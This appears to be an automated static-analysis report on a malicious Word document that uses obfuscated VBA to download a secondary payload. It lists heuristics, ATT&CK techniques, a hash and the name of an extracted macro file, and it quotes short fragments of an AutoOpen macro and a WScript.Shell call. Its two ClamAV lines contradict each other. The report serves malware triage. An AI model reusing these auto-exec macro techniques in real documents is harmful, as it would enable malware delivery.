Verdict: MALICIOUS (Risk Score 310)

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample contains VBA macros that trigger critical heuristics for WScript.Shell usage and Shell() calls, indicating that it attempts to execute commands. The macro code appears to be obfuscated but most likely constructs and executes a command, possibly involving PowerShell, that downloads and runs a secondary payload. The ClamAV detection 'Doc.Downloader.Valyria-6664649-0' further supports its role as a downloader.
Heuristics (10)

- ClamAV: Doc.Downloader.Valyria-6664649-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Valyria-6664649-0.
- VBA macros detected [medium, OLE_VBA_MACROS, 4 related findings]: Document contains VBA macro code.
- WScript.Shell usage [critical, OLE_VBA_WSCRIPT]: WScript.Shell usage. Matched line in script: `Error 15526 / 60673 iqJwHjWwLjk = CreateObject("WScript.Shell") _ . _`
- CreateObject call [high, OLE_VBA_CREATEOBJ]: CreateObject call. Matched line in script: `Error 15526 / 60673 iqJwHjWwLjk = CreateObject("WScript.Shell") _ . _`
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro [low, OLE_VBA_AUTOOPEN]: AutoOpen macro. Matched line in script: `Attribute VB_Name = "JuljlCOB" Sub AutoOpen() On Error Resume Next`
- Reference to Windows Script Host [high, SC_STR_WSCRIPT]: Reference to Windows Script Host.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact [medium, EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body).
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10767 bytes |

SHA-256: d28fefc00b26d64fadc749c1e8b0ac78eb43f0c8c420bc45a3eded8495111c4d

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 132 of 231 identifiers look randomly generated (e.g. 'NQKzJRAJmqhGjV'); 3 string-concatenation chain(s); consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script)